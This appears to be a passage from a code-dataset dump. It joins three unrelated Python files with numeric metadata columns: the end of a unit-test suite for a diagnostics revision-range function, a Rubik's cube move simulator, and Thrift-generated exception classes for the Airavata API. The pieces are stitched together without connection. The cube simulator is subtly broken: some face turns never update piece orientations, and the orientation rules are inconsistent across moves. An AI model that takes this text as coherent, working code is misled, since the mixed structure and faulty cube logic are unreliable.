self._CheckExpectations(e, guid_mapping, [
(10, sys.maxsize, [u'm2']),
])
def testFindOrInsertDiagnostics_Latest_New(self):
test_key = utils.TestKey('M/B/S')
e = self._CreateGenericDiagnostic('foo', 'm1', test_key, 10)
guid_mapping = (
histogram.SparseDiagnostic.FindOrInsertDiagnostics(
[e], test_key, e.start_revision, e.start_revision).get_result())
self._CheckExpectations(e, guid_mapping, [
(10, sys.maxsize, [u'm1']),
])
def testFindOrInsertDiagnostics_OutOfOrder_Same(self):
test_key = utils.TestKey('M/B/S')
self._AddGenericDiagnostic('foo', 'm1', test_key, 1)
self._AddGenericDiagnostic('foo', 'm1', test_key, 10)
e = self._CreateGenericDiagnostic('foo', 'm1', test_key, 5)
guid_mapping = (
histogram.SparseDiagnostic.FindOrInsertDiagnostics([e], test_key,
e.start_revision,
10).get_result())
self._CheckExpectations(e, guid_mapping, [
(1, sys.maxsize, [u'm1']),
])
def testFindOrInsertDiagnostics_OutOfOrder_Before_Same(self):
test_key = utils.TestKey('M/B/S')
self._AddGenericDiagnostic('foo', 'm1', test_key, 5)
self._AddGenericDiagnostic('foo', 'm1', test_key, 10)
e = self._CreateGenericDiagnostic('foo', 'm1', test_key, 1)
guid_mapping = (
histogram.SparseDiagnostic.FindOrInsertDiagnostics([e], test_key,
e.start_revision,
10).get_result())
self._CheckExpectations(e, guid_mapping, [
(1, sys.maxsize, [u'm1']),
])
def testFindOrInsertDiagnostics_OutOfOrder_Before_Diff(self):
test_key = utils.TestKey('M/B/S')
self._AddGenericDiagnostic('foo', 'm1', test_key, 5)
self._AddGenericDiagnostic('foo', 'm1', test_key, 10)
e = self._CreateGenericDiagnostic('foo', 'm2', test_key, 1)
guid_mapping = (
histogram.SparseDiagnostic.FindOrInsertDiagnostics([e], test_key,
e.start_revision,
10).get_result())
self._CheckExpectations(e, guid_mapping, [
(1, 4, [u'm2']),
(5, sys.maxsize, [u'm1']),
])
def testFindOrInsertDiagnostics_OutOfOrder_Splits_CurSame_NextDiff(self):
test_key = utils.TestKey('M/B/S')
self._AddGenericDiagnostic('foo', 'm1', test_key, 1)
self._AddGenericDiagnostic('foo', 'm1', test_key, 10)
e = self._CreateGenericDiagnostic('foo', 'm2', test_key, 5)
guid_mapping = (
histogram.SparseDiagnostic.FindOrInsertDiagnostics([e], test_key,
e.start_revision,
10).get_result())
self._CheckExpectations(e, guid_mapping, [
(1, 4, [u'm1']),
(5, 9, [u'm2']),
(10, sys.maxsize, [u'm1']),
])
def testFindOrInsertDiagnostics_OutOfOrder_Splits_CurDiff_NextNone(self):
test_key = utils.TestKey('M/B/S')
self._AddGenericDiagnostic('foo', 'm1', test_key, 1)
self._AddGenericDiagnostic('foo', 'm1', test_key, 10)
e = self._CreateGenericDiagnostic('foo', 'm2', test_key, 12)
guid_mapping = (
histogram.SparseDiagnostic.FindOrInsertDiagnostics([e], test_key,
e.start_revision,
10).get_result())
self._CheckExpectations(e, guid_mapping, [
(1, 11, [u'm1']),
(12, sys.maxsize, [u'm2']),
])
def testFindOrInsertDiagnostics_OutOfOrder_Splits_CurDiff_NextNone_Rev(self):
test_key = utils.TestKey('M/B/S')
self._AddGenericDiagnostic('foo', 'm1', test_key, 1)
self._AddGenericDiagnostic('foo', 'm1', test_key, 10)
e = self._CreateGenericDiagnostic('foo', 'm2', test_key, 8)
guid_mapping = (
histogram.SparseDiagnostic.FindOrInsertDiagnostics([e], test_key,
e.start_revision,
10).get_result())
self._CheckExpectations(e, guid_mapping, [
(1, 7, [u'm1']),
(8, 9, [u'm2']),
(10, sys.maxsize, [u'm1']),
])
def testFindOrInsertDiagnostics_OutOfOrder_Splits_CurDiff_HasRevs(self):
test_key = utils.TestKey('M/B/S')
self._AddGenericDiagnostic('foo', 'm1', test_key, 1)
self._AddGenericDiagnostic('foo', 'm1', test_key, 8)
self._AddGenericDiagnostic('foo', 'm2', test_key, 10)
e = self._CreateGenericDiagnostic('foo', 'm2', test_key, 5)
guid_mapping = (
histogram.SparseDiagnostic.FindOrInsertDiagnostics([e], test_key,
e.start_revision,
10).get_result())
self._CheckExpectations(e, guid_mapping, [
(1, 4, [u'm1']),
(5, 7, [u'm2']),
(8, 9, [u'm1']),
(10, sys.maxsize, [u'm2']),
])
def testFindOrInsertDiagnostics_OutOfOrder_Splits_CurDiff_NextDiff(self):
test_key = utils.TestKey('M/B/S')
self._AddGenericDiagnostic('foo', 'm1', test_key, 1)
self._AddGenericDiagnostic('foo', 'm3', test_key, 10)
e = self._CreateGenericDiagnostic('foo', 'm2', test_key, 5)
guid_mapping = (
histogram.SparseDiagnostic.FindOrInsertDiagnostics([e], test_key,
e.start_revision,
10).get_result())
self._CheckExpectations(e, guid_mapping, [
(1, 4, [u'm1']),
(5, 9, [u'm2']),
(10, sys.maxsize, [u'm3']),
])
def testFindOrInsertDiagnostics_OutOfOrder_Splits_CurDiff_NextSame(self):
test_key = utils.TestKey('M/B/S')
self._AddGenericDiagnostic('foo', 'm1', test_key, 1)
self._AddGenericDiagnostic('foo', 'm3', test_key, 10)
e = self._CreateGenericDiagnostic('foo', 'm3', test_key, 5)
guid_mapping = (
histogram.SparseDiagnostic.FindOrInsertDiagnostics([e], test_key,
e.start_revision,
10).get_result())
self._CheckExpectations(e, guid_mapping, [
(1, 4, [u'm1']),
(5, sys.maxsize, [u'm3']),
])
def testFindOrInsertDiagnostics_OutOfOrder_Clobber_NoNext_NoRevs(self):
test_key = utils.TestKey('M/B/S')
self._AddGenericDiagnostic('foo', 'm1', test_key, 1)
self._AddGenericDiagnostic('foo', 'm3', test_key, 10)
e = self._CreateGenericDiagnostic('foo', 'm2', test_key, 10)
guid_mapping = (
histogram.SparseDiagnostic.FindOrInsertDiagnostics([e], test_key,
e.start_revision,
10).get_result())
self._CheckExpectations(e, guid_mapping, [
(1, 9, [u'm1']),
(10, sys.maxsize, [u'm2']),
])
def testFindOrInsertDiagnostics_OutOfOrder_Clobber_NoNext_Revs(self):
test_key = utils.TestKey('M/B/S')
self._AddGenericDiagnostic('foo', 'm1', test_key, 1)
self._AddGenericDiagnostic('foo', 'm3', test_key, 10)
self._AddGenericDiagnostic('foo', 'm3', test_key, 15)
e = self._CreateGenericDiagnostic('foo', 'm2', test_key, 10)
guid_mapping = (
histogram.SparseDiagnostic.FindOrInsertDiagnostics([e], test_key,
e.start_revision,
15).get_result())
self._CheckExpectations(e, guid_mapping, [
(1, 9, [u'm1']),
(10, 14, [u'm2']),
(15, sys.maxsize, [u'm3']),
])
def testFindOrInsertDiagnostics_OutOfOrder_Clobber_Next_Revs(self):
test_key = utils.TestKey('M/B/S')
self._AddGenericDiagnostic('foo', 'm1', test_key, 1)
self._AddGenericDiagnostic('foo', 'm3', test_key, 10)
self._AddGenericDiagnostic('foo', 'm3', test_key, 13)
self._AddGenericDiagnostic('foo', 'm4', test_key, 15)
e = self._CreateGenericDiagnostic('foo', 'm2', test_key, 10)
guid_mapping = (
histogram.SparseDiagnostic.FindOrInsertDiagnostics([e], test_key,
e.start_revision,
15).get_result())
self._CheckExpectations(e, guid_mapping, [
(1, 9, [u'm1']),
(10, 12, [u'm2']),
(13, 14, [u'm3']),
(15, sys.maxsize, [u'm4']),
])
def testFindOrInsertDiagnostics_OutOfOrder_Clobber_Next_Revs_Same(self):
test_key = utils.TestKey('M/B/S')
self._AddGenericDiagnostic('foo', 'm1', test_key, 1)
self._AddGenericDiagnostic('foo', 'm3', test_key, 10)
self._AddGenericDiagnostic('foo', 'm2', test_key, 15)
e = self._CreateGenericDiagnostic('foo', 'm2', test_key, 10)
guid_mapping = (
histogram.SparseDiagnostic.FindOrInsertDiagnostics([e], test_key,
e.start_revision,
15).get_result())
self._CheckExpectations(e, guid_mapping, [
(1, 9, [u'm1']),
(10, sys.maxsize, [u'm2']),
])
def testFindOrInsertDiagnostics_OutOfOrder_Clobber_Next_NoRevs_Diff(self):
test_key = utils.TestKey('M/B/S')
self._AddGenericDiagnostic('foo', 'm1', test_key, 1)
self._AddGenericDiagnostic('foo', 'm2', test_key, 10)
self._AddGenericDiagnostic('foo', 'm3', test_key, 15)
e = self._CreateGenericDiagnostic('foo', 'm4', test_key, 10)
guid_mapping = (
histogram.SparseDiagnostic.FindOrInsertDiagnostics([e], test_key,
e.start_revision,
15).get_result())
self._CheckExpectations(e, guid_mapping, [
(1, 9, [u'm1']),
(10, 14, [u'm4']),
(15, sys.maxsize, [u'm3']),
])
def testFindOrInsertDiagnostics_OutOfOrder_Clobber_Next_NoRevs_Same(self):
test_key = utils.TestKey('M/B/S')
self._AddGenericDiagnostic('foo', 'm1', test_key, 1)
self._AddGenericDiagnostic('foo', 'm2', test_key, 10)
self._AddGenericDiagnostic('foo', 'm3', test_key, 15)
e = self._CreateGenericDiagnostic('foo', 'm3', test_key, 10)
guid_mapping = (
histogram.SparseDiagnostic.FindOrInsertDiagnostics([e], test_key,
e.start_revision,
15).get_result())
self._CheckExpectations(e, guid_mapping, [
(1, 9, [u'm1']),
(10, sys.maxsize, [u'm3']),
])
def testFindOrInsertDiagnostics_OutOfOrder_Clobber_Next_Prev_Same(self):
test_key = utils.TestKey('M/B/S')
self._AddGenericDiagnostic('foo', 'm1', test_key, 1)
self._AddGenericDiagnostic('foo', 'm2', test_key, 10)
self._AddGenericDiagnostic('foo', 'm1', test_key, 15)
e = self._CreateGenericDiagnostic('foo', 'm1', test_key, 10)
guid_mapping = (
histogram.SparseDiagnostic.FindOrInsertDiagnostics([e], test_key,
e.start_revision,
15).get_result())
self._CheckExpectations(e, guid_mapping, [
(1, sys.maxsize, [u'm1']),
])
def testFindOrInsertDiagnostics_OutOfOrder_Clobber_NextDiff_PrevSame(self):
test_key = utils.TestKey('M/B/S')
self._AddGenericDiagnostic('foo', 'm1', test_key, 1)
self._AddGenericDiagnostic('foo', 'm2', test_key, 10)
self._AddGenericDiagnostic('foo', 'm3', test_key, 15)
e = self._CreateGenericDiagnostic('foo', 'm1', test_key, 10)
guid_mapping = (
histogram.SparseDiagnostic.FindOrInsertDiagnostics([e], test_key,
e.start_revision,
15).get_result())
self._CheckExpectations(e, guid_mapping, [
(1, 14, [u'm1']),
(15, sys.maxsize, [u'm3']),
])
| 35.386577
| 80
| 0.58859
| 2,762
| 26,363
| 5.403331
| 0.08798
| 0.067542
| 0.083222
| 0.027339
| 0.832552
| 0.814058
| 0.80528
| 0.798378
| 0.762128
| 0.748325
| 0
| 0.031122
| 0.279672
| 26,363
| 744
| 81
| 35.43414
| 0.754766
| 0.019042
| 0
| 0.708263
| 0
| 0
| 0.061281
| 0.006964
| 0
| 0
| 0
| 0.001344
| 0.040472
| 1
| 0.057336
| false
| 0
| 0.016863
| 0
| 0.079258
| 0.001686
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
97ea9d82229730c7fd27be65e43b73c230b02244
| 14,398
|
py
|
Python
|
2012/AC_Rob.py
|
Valchris/IEEEXtreme_WorkingAsIntended
|
c3e04633ce6d9c1a1582081767e8f2090adffa28
|
[
"MIT"
] | null | null | null |
2012/AC_Rob.py
|
Valchris/IEEEXtreme_WorkingAsIntended
|
c3e04633ce6d9c1a1582081767e8f2090adffa28
|
[
"MIT"
] | null | null | null |
2012/AC_Rob.py
|
Valchris/IEEEXtreme_WorkingAsIntended
|
c3e04633ce6d9c1a1582081767e8f2090adffa28
|
[
"MIT"
] | null | null | null |
class Orientation(object):
UP=0
LEFT=1
FRONT=2
RIGHT=3
BACK=4
DOWN=5
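# The Cube constructor below indexes a six-character face-colour string by these
# constants, so for the sample input "YRBOGW" used at the bottom of this file:
# UP='Y', LEFT='R', FRONT='B', RIGHT='O', BACK='G', DOWN='W'.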
class Piece(object):
def __init__(self, faces):
self.faces = faces
self.orientation = Orientation.FRONT
self.orientation2 = Orientation.UP
def GetOrientation(self):
return self.orientation
def SetOrientation(self, o):
self.orientation = o
def GetOrientation2(self):
return self.orientation2
def SetOrientation2(self, o):
self.orientation2 = o
def GetFaces(self):
        return self.faces
def FrontFace(self):
return self.faces[int(self.orientation)]
def __str__(self):
return str(self.faces) + str(",") + str(self.orientation)
class Cube(object):
def __init__(self, faceColours):
self.pieces = []
for i in range(0,3):
self.pieces.append([])
for j in range(0,3):
self.pieces[i].append([])
self.pieces[0][0].append(Piece(str(faceColours[Orientation.UP]) + str(faceColours[Orientation.LEFT]) + str(faceColours[Orientation.FRONT]) + str("-") + str("-") + str("-")))
self.pieces[0][0].append(Piece(str(faceColours[Orientation.UP]) + str(faceColours[Orientation.LEFT]) + str("-") + str("-") + str("-") + str("-")))
self.pieces[0][0].append(Piece(str(faceColours[Orientation.UP]) + str(faceColours[Orientation.LEFT]) + str("-") + str("-") + str(faceColours[Orientation.BACK]) + str("-")))
self.pieces[0][1].append(Piece(str(faceColours[Orientation.UP]) + str("-") + str(faceColours[Orientation.FRONT]) + str("-") + str("-") + str("-")))
self.pieces[0][1].append(Piece(str(faceColours[Orientation.UP]) + str("-") + str("-") + str("-") + str("-") + str("-")))
self.pieces[0][1].append(Piece(str(faceColours[Orientation.UP]) + str("-") + str("-") + str("-") + str(faceColours[Orientation.BACK]) + str("-")))
self.pieces[0][2].append(Piece(str(faceColours[Orientation.UP]) + str("-") + str(faceColours[Orientation.FRONT]) + str(faceColours[Orientation.RIGHT]) + str("-") + str("-")))
self.pieces[0][2].append(Piece(str(faceColours[Orientation.UP]) + str("-") + str("-") + str(faceColours[Orientation.RIGHT]) + str("-") + str("-")))
self.pieces[0][2].append(Piece(str(faceColours[Orientation.UP]) + str("-") + str("-") + str(faceColours[Orientation.RIGHT]) + str(faceColours[Orientation.BACK]) + str("-")))
self.pieces[1][0].append(Piece(str("-") + str("-") + str(faceColours[Orientation.FRONT]) + str(faceColours[Orientation.LEFT]) + str("-") + str("-")))
self.pieces[1][0].append(Piece(str("-") + str("-") + str("-") + str(faceColours[Orientation.LEFT]) + str("-") + str("-")))
self.pieces[1][0].append(Piece(str("-") + str("-") + str("-") + str(faceColours[Orientation.LEFT]) + str(faceColours[Orientation.BACK]) + str("-")))
self.pieces[1][1].append(Piece(str("-") + str("-") + str(faceColours[Orientation.FRONT]) + str("-") + str("-") + str("-")))
self.pieces[1][1].append(Piece(str("-") + str("-") + str("-") + str("-") + str("-") + str("-")))
self.pieces[1][1].append(Piece(str("-") + str("-") + str("-") + str("-") + str(faceColours[Orientation.BACK]) + str("-")))
self.pieces[1][2].append(Piece(str("-") + str("-") + str(faceColours[Orientation.FRONT]) + str(faceColours[Orientation.RIGHT]) + str("-") + str("-")))
self.pieces[1][2].append(Piece(str("-") + str("-") + str("-") + str(faceColours[Orientation.RIGHT]) + str("-") + str("-")))
self.pieces[1][2].append(Piece(str("-") + str("-") + str("-") + str(faceColours[Orientation.RIGHT]) + str(faceColours[Orientation.BACK]) + str("-")))
self.pieces[2][0].append(Piece(str("-") + str("-") + str(faceColours[Orientation.FRONT]) + str(faceColours[Orientation.LEFT]) + str("-") + str(faceColours[Orientation.DOWN])))
self.pieces[2][0].append(Piece(str("-") + str("-") + str("-") + str(faceColours[Orientation.LEFT]) + str("-") + str(faceColours[Orientation.DOWN])))
self.pieces[2][0].append(Piece(str("-") + str("-") + str("-") + str(faceColours[Orientation.LEFT]) + str(faceColours[Orientation.BACK]) + str(faceColours[Orientation.DOWN])))
self.pieces[2][1].append(Piece(str("-") + str("-") + str(faceColours[Orientation.FRONT]) + str("-") + str("-") + str(faceColours[Orientation.DOWN])))
self.pieces[2][1].append(Piece(str("-") + str("-") + str("-") + str("-") + str("-") + str(faceColours[Orientation.DOWN])))
self.pieces[2][1].append(Piece(str("-") + str("-") + str("-") + str("-") + str(faceColours[Orientation.BACK]) + str(faceColours[Orientation.DOWN])))
self.pieces[2][2].append(Piece(str("-") + str("-") + str(faceColours[Orientation.FRONT]) + str(faceColours[Orientation.RIGHT]) + str("-") + str(faceColours[Orientation.DOWN])))
self.pieces[2][2].append(Piece(str("-") + str("-") + str("-") + str(faceColours[Orientation.RIGHT]) + str("-") + str(faceColours[Orientation.DOWN])))
self.pieces[2][2].append(Piece(str("-") + str("-") + str("-") + str(faceColours[Orientation.RIGHT]) + str(faceColours[Orientation.BACK]) + str(faceColours[Orientation.DOWN])))
def U(self, num):
for i in range (0,num):
temp = self.pieces[0][0][0]
self.pieces[0][0][0] = self.pieces[0][2][0]
self.pieces[0][2][0] = self.pieces[0][2][2]
self.pieces[0][2][2] = self.pieces[0][0][2]
self.pieces[0][0][2] = temp
temp = self.pieces[0][0][1]
self.pieces[0][0][1] = self.pieces[0][1][0]
self.pieces[0][1][0] = self.pieces[0][2][1]
self.pieces[0][2][1] = self.pieces[0][1][2]
self.pieces[0][1][2] = temp
for i in range(0,3):
for j in range(0,3):
if self.pieces[0][i][j].GetOrientation() == Orientation.UP:
self.pieces[0][i][j].SetOrientation(Orientation.RIGHT)
elif self.pieces[0][i][j].GetOrientation() == Orientation.LEFT:
self.pieces[0][i][j].SetOrientation(Orientation.FRONT)
elif self.pieces[0][i][j].GetOrientation() == Orientation.FRONT:
self.pieces[0][i][j].SetOrientation(Orientation.RIGHT)
elif self.pieces[0][i][j].GetOrientation() == Orientation.RIGHT:
self.pieces[0][i][j].SetOrientation(Orientation.BACK)
elif self.pieces[0][i][j].GetOrientation() == Orientation.BACK:
self.pieces[0][i][j].SetOrientation(Orientation.LEFT)
elif self.pieces[0][i][j].GetOrientation() == Orientation.DOWN:
self.pieces[0][i][j].SetOrientation(Orientation.RIGHT)
def L(self, num):
for i in range (0,num):
temp = self.pieces[2][0][2]
self.pieces[2][0][2] = self.pieces[2][0][0]
self.pieces[2][0][0] = self.pieces[0][0][0]
self.pieces[0][0][0] = self.pieces[0][0][2]
self.pieces[0][0][2] = temp
temp = self.pieces[1][0][2]
self.pieces[1][0][2] = self.pieces[2][0][1]
self.pieces[2][0][1] = self.pieces[1][0][0]
self.pieces[1][0][0] = self.pieces[0][0][1]
self.pieces[0][0][1] = temp
for i in range(0,3):
for j in range(0,3):
if self.pieces[i][0][j].GetOrientation() == Orientation.UP:
self.pieces[i][0][j].SetOrientation(Orientation.BACK)
elif self.pieces[i][0][j].GetOrientation() == Orientation.LEFT:
self.pieces[i][0][j].SetOrientation(Orientation.UP)
elif self.pieces[i][0][j].GetOrientation() == Orientation.FRONT:
self.pieces[i][0][j].SetOrientation(Orientation.UP)
elif self.pieces[i][0][j].GetOrientation() == Orientation.RIGHT:
self.pieces[i][0][j].SetOrientation(Orientation.UP)
elif self.pieces[i][0][j].GetOrientation() == Orientation.BACK:
self.pieces[i][0][j].SetOrientation(Orientation.DOWN)
elif self.pieces[i][0][j].GetOrientation() == Orientation.DOWN:
                    self.pieces[i][0][j].SetOrientation(Orientation.FRONT)
def F(self, num):
for i in range (0,num):
temp = self.pieces[0][0][0]
self.pieces[0][0][0] = self.pieces[2][0][0]
self.pieces[2][0][0] = self.pieces[2][2][0]
self.pieces[2][2][0] = self.pieces[0][2][0]
self.pieces[0][2][0] = temp
temp = self.pieces[1][0][0]
self.pieces[1][0][0] = self.pieces[2][1][0]
self.pieces[2][1][0] = self.pieces[1][2][0]
self.pieces[1][2][0] = self.pieces[0][1][0]
self.pieces[0][1][0] = temp
def R(self, num):
for i in range (0,num):
temp = self.pieces[0][2][0]
self.pieces[0][2][0] = self.pieces[2][2][0]
self.pieces[2][2][0] = self.pieces[2][2][2]
self.pieces[2][2][2] = self.pieces[0][2][2]
self.pieces[0][2][2] = temp
temp = self.pieces[1][2][0]
self.pieces[1][2][0] = self.pieces[2][2][1]
self.pieces[2][2][1] = self.pieces[1][2][2]
self.pieces[1][2][2] = self.pieces[0][2][1]
self.pieces[0][2][1] = temp
for i in range(0,3):
for j in range(0,3):
if self.pieces[i][2][j].GetOrientation() == Orientation.UP:
self.pieces[i][2][j].SetOrientation(Orientation.FRONT)
elif self.pieces[i][2][j].GetOrientation() == Orientation.LEFT:
self.pieces[i][2][j].SetOrientation(Orientation.DOWN)
elif self.pieces[i][2][j].GetOrientation() == Orientation.FRONT:
self.pieces[i][2][j].SetOrientation(Orientation.DOWN)
elif self.pieces[i][2][j].GetOrientation() == Orientation.RIGHT:
self.pieces[i][2][j].SetOrientation(Orientation.DOWN)
elif self.pieces[i][2][j].GetOrientation() == Orientation.BACK:
self.pieces[i][2][j].SetOrientation(Orientation.UP)
elif self.pieces[i][2][j].GetOrientation() == Orientation.DOWN:
                    self.pieces[i][2][j].SetOrientation(Orientation.BACK)
def B(self, num):
for i in range (0,num):
temp = self.pieces[0][2][2]
self.pieces[0][2][2] = self.pieces[2][2][2]
self.pieces[2][2][2] = self.pieces[2][0][2]
self.pieces[2][0][2] = self.pieces[0][0][2]
self.pieces[0][0][2] = temp
temp = self.pieces[1][2][2]
self.pieces[1][2][2] = self.pieces[2][1][2]
self.pieces[2][1][2] = self.pieces[1][0][2]
self.pieces[1][0][2] = self.pieces[0][1][2]
self.pieces[0][1][2] = temp
def D(self, num):
for i in range (0,num):
temp = self.pieces[2][0][0]
self.pieces[2][0][0] = self.pieces[2][0][2]
self.pieces[2][0][2] = self.pieces[2][2][2]
self.pieces[2][2][2] = self.pieces[2][2][0]
self.pieces[2][2][0] = temp
temp = self.pieces[2][0][1]
self.pieces[2][0][1] = self.pieces[2][1][2]
self.pieces[2][1][2] = self.pieces[2][2][1]
self.pieces[2][2][1] = self.pieces[2][1][0]
self.pieces[2][1][0] = temp
for i in range(0,3):
for j in range(0,3):
if self.pieces[2][i][j].GetOrientation() == Orientation.UP:
self.pieces[2][i][j].SetOrientation(Orientation.LEFT)
elif self.pieces[2][i][j].GetOrientation() == Orientation.LEFT:
self.pieces[2][i][j].SetOrientation(Orientation.FRONT)
elif self.pieces[2][i][j].GetOrientation() == Orientation.FRONT:
self.pieces[2][i][j].SetOrientation(Orientation.RIGHT)
elif self.pieces[2][i][j].GetOrientation() == Orientation.RIGHT:
self.pieces[2][i][j].SetOrientation(Orientation.BACK)
elif self.pieces[2][i][j].GetOrientation() == Orientation.BACK:
self.pieces[2][i][j].SetOrientation(Orientation.RIGHT)
elif self.pieces[2][i][j].GetOrientation() == Orientation.DOWN:
                    self.pieces[2][i][j].SetOrientation(Orientation.RIGHT)
def PrintFront(self):
        output = str()
        output += self.pieces[0][0][0].FrontFace() + str(" ") + self.pieces[0][1][0].FrontFace() + str(" ") + self.pieces[0][2][0].FrontFace() + str("\n")
        output += self.pieces[1][0][0].FrontFace() + str(" ") + self.pieces[1][1][0].FrontFace() + str(" ") + self.pieces[1][2][0].FrontFace() + str("\n")
        output += self.pieces[2][0][0].FrontFace() + str(" ") + self.pieces[2][1][0].FrontFace() + str(" ") + self.pieces[2][2][0].FrontFace()
        print(output)
def parse_singmaster(c,input_string):
cur_index = 0
while cur_index < len(input_string):
num_rotations = 1
if(cur_index + 1 < len(input_string) and input_string[cur_index + 1] == '2'):
num_rotations = 2
if(cur_index + 1 < len(input_string) and input_string[cur_index + 1] == "'"):
num_rotations = 3
if input_string[cur_index] == 'F':
c.F(num_rotations)
elif input_string[cur_index] == 'B':
c.B(num_rotations)
elif input_string[cur_index] == 'U':
c.U(num_rotations)
elif input_string[cur_index] == 'D':
c.D(num_rotations)
elif input_string[cur_index] == 'L':
c.L(num_rotations)
elif input_string[cur_index] == 'R':
c.R(num_rotations)
elif input_string[cur_index] == '\'' or input_string[cur_index] == '2' or input_string[cur_index] == '\n':
pass
else:
raise Exception()
cur_index += 1
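# Note on parse_singmaster: each move letter (F, B, U, D, L, R) is applied once,
# twice when followed by '2', and three times when followed by "'" (a
# counter-clockwise quarter turn expressed as three clockwise quarter turns).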
import sys
#cube_format = sys.stdin.readline()
#moves = sys.stdin.readline()
cube_format = "YRBOGW"
moves = "FL"
c = Cube(cube_format)
parse_singmaster(c, moves)
c.PrintFront()
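# A minimal sketch of the stdin-driven variant hinted at by the commented-out
# readline() calls above: replace the two hard-coded values with
#   cube_format = sys.stdin.readline().strip()
#   moves = sys.stdin.readline().strip()
# (the .strip() is an assumption about the input format; parse_singmaster
# already tolerates a trailing newline).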
| 52.356364
| 184
| 0.538894
| 1,853
| 14,398
| 4.156503
| 0.042094
| 0.237601
| 0.091405
| 0.101792
| 0.884316
| 0.876915
| 0.848611
| 0.760971
| 0.651909
| 0.651779
| 0
| 0.043056
| 0.249896
| 14,398
| 275
| 185
| 52.356364
| 0.670093
| 0.004306
| 0
| 0.151111
| 0
| 0
| 0.013812
| 0.003209
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.004444
| 0.004444
| null | null | 0.004444
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3f1761f2e844541e9d33f2f0613b0ea8361f1ba8
| 33,048
|
py
|
Python
|
airavata-api/airavata-client-sdks/airavata-python-sdk/airavata/api/error/ttypes.py
|
docquantum/airavata
|
4ec5fa0aab1b75ca1e98a16648c57cd8abdb4b9c
|
[
"ECL-2.0",
"Apache-2.0"
] | 74
|
2015-04-10T02:57:26.000Z
|
2022-02-28T16:10:03.000Z
|
airavata-api/airavata-client-sdks/airavata-python-sdk/airavata/api/error/ttypes.py
|
docquantum/airavata
|
4ec5fa0aab1b75ca1e98a16648c57cd8abdb4b9c
|
[
"ECL-2.0",
"Apache-2.0"
] | 126
|
2015-04-26T02:55:26.000Z
|
2022-02-16T22:43:28.000Z
|
airavata-api/airavata-client-sdks/airavata-python-sdk/airavata/api/error/ttypes.py
|
docquantum/airavata
|
4ec5fa0aab1b75ca1e98a16648c57cd8abdb4b9c
|
[
"ECL-2.0",
"Apache-2.0"
] | 163
|
2015-01-22T14:05:24.000Z
|
2022-03-17T12:24:34.000Z
|
#
# Autogenerated by Thrift Compiler (0.10.0)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException
from thrift.protocol.TProtocol import TProtocolException
import sys
import airavata.model.experiment.ttypes
from thrift.transport import TTransport
class AiravataErrorType(object):
"""
A list of Airavata API Error Message Types
UNKNOWN: No information available about the error
PERMISSION_DENIED: Not permitted to perform action
INTERNAL_ERROR: Unexpected problem with the service
AUTHENTICATION_FAILURE: The client failed to authenticate.
INVALID_AUTHORIZATION: Security Token and/or Username and/or password is incorrect
AUTHORIZATION_EXPIRED: Authentication token expired
UNKNOWN_GATEWAY_ID: The gateway is not registered with Airavata.
UNSUPPORTED_OPERATION: Operation denied because it is currently unsupported.
"""
UNKNOWN = 0
PERMISSION_DENIED = 1
INTERNAL_ERROR = 2
AUTHENTICATION_FAILURE = 3
INVALID_AUTHORIZATION = 4
AUTHORIZATION_EXPIRED = 5
UNKNOWN_GATEWAY_ID = 6
UNSUPPORTED_OPERATION = 7
_VALUES_TO_NAMES = {
0: "UNKNOWN",
1: "PERMISSION_DENIED",
2: "INTERNAL_ERROR",
3: "AUTHENTICATION_FAILURE",
4: "INVALID_AUTHORIZATION",
5: "AUTHORIZATION_EXPIRED",
6: "UNKNOWN_GATEWAY_ID",
7: "UNSUPPORTED_OPERATION",
}
_NAMES_TO_VALUES = {
"UNKNOWN": 0,
"PERMISSION_DENIED": 1,
"INTERNAL_ERROR": 2,
"AUTHENTICATION_FAILURE": 3,
"INVALID_AUTHORIZATION": 4,
"AUTHORIZATION_EXPIRED": 5,
"UNKNOWN_GATEWAY_ID": 6,
"UNSUPPORTED_OPERATION": 7,
}
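# Illustrative usage (editor's sketch, not part of the generated module): the
# paired tables above translate between numeric codes and names, e.g.
#   AiravataErrorType._VALUES_TO_NAMES[AiravataErrorType.PERMISSION_DENIED]  -> 'PERMISSION_DENIED'
#   AiravataErrorType._NAMES_TO_VALUES['INTERNAL_ERROR']                     -> 2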
class ExperimentNotFoundException(TException):
"""
This exception is thrown when a client asks to perform an operation on an experiment that does not exist.
identifier: A description of the experiment that was not found on the server.
key: The value passed from the client in the identifier, which was not found.
Attributes:
- message
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'message', 'UTF8', None, ), # 1
)
def __init__(self, message=None,):
self.message = message
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.message = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('ExperimentNotFoundException')
if self.message is not None:
oprot.writeFieldBegin('message', TType.STRING, 1)
oprot.writeString(self.message.encode('utf-8') if sys.version_info[0] == 2 else self.message)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.message is None:
raise TProtocolException(message='Required field message is unset!')
return
def __str__(self):
return repr(self)
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
